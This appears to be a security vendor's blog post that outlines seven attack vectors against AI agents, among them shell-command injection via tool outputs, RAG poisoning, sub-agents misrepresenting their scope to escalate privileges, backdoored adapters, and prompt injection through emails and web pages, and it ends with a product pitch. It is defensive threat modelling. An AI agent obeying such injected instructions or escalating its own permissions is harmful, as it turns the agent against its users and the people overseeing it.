The 7 Ways Agents Get Compromised

As AI agents move from demos into production pipelines, the threat surface has expanded dramatically. Unlike a chatbot that merely returns text, a modern agent can write files, execute code, browse the web, call external APIs, and delegate subtasks to other models, all in a single request. This post maps the seven most common attack vectors we observe across customer deployments, with concrete examples of each.

What Is Code Execution Escape?

Agents with access to a code interpreter or shell can be manipulated into running attacker-supplied commands. This usually happens through a crafted user prompt or a malicious tool output that embeds shell metacharacters. Sandboxing helps, but poorly scoped sandboxes still allow network egress, filesystem writes, or subprocess spawning that exposes the host.

What Are Browser Scope Leakage, RAG Poisoning, and Multi-Agent Escalation?

Browser-use agents capture screenshots of the full desktop, inadvertently exposing credential managers, open documents, and other sensitive windows that were never meant to be in scope. RAG poisoning is subtler: a single attacker-controlled document injected into a vector store can alter the instructions retrieved for every future query that touches it. Multi-agent delegation chains compound the risk, a compromised sub-agent can escalate privileges by misrepresenting its scope to an orchestrator that trusts its output without re-validating permissions.

What Are MCP Scope Violations, Supply Chain Backdoors, and Cross-Channel Injection?

The Model Context Protocol has no native authentication or per-tool permission boundary, so a tool registered with broad scope can be invoked in contexts the developer never intended. Model supply chain backdoors are particularly dangerous: a compromised fine-tune or adapter layer can introduce a persistent trigger that activates silently under specific input patterns. Cross-channel injection spans the widest surface area, instructions can arrive through emails read by the agent, web pages it browses, or calendar events it parses, none of which pass through your prompt filtering layer.

Code execution escape via shell metacharacter injection in tool outputs
Browser screenshot scope leakage exposing credentials and open documents
RAG poisoning through adversarially crafted documents in the vector store
Multi-agent privilege escalation via trust misrepresentation in delegation chains
MCP scope violation through over-permissioned tool registration
Model supply chain backdoors in fine-tuned adapters or third-party weights
Cross-channel prompt injection from emails, web pages, and calendar events

QuilrAI

How QuilrAI addresses this: The Guardian Agent enforces per-tool permission boundaries at the MCP layer, intercepts all tool call outputs before they reach the model, and maintains a provenance index on every document in the RAG store, blocking poisoned chunks before retrieval.

The 7 Ways Agents Get Compromised

What Is Code Execution Escape?

What Are Browser Scope Leakage, RAG Poisoning, and Multi-Agent Escalation?

What Are MCP Scope Violations, Supply Chain Backdoors, and Cross-Channel Injection?

Related Articles

RAG Poisoning: The Silent Attack on AI Memory

Why Your Firewall Doesn't Speak MCP

Browser Agents Are Reading Your Passwords

Secure your AI stack today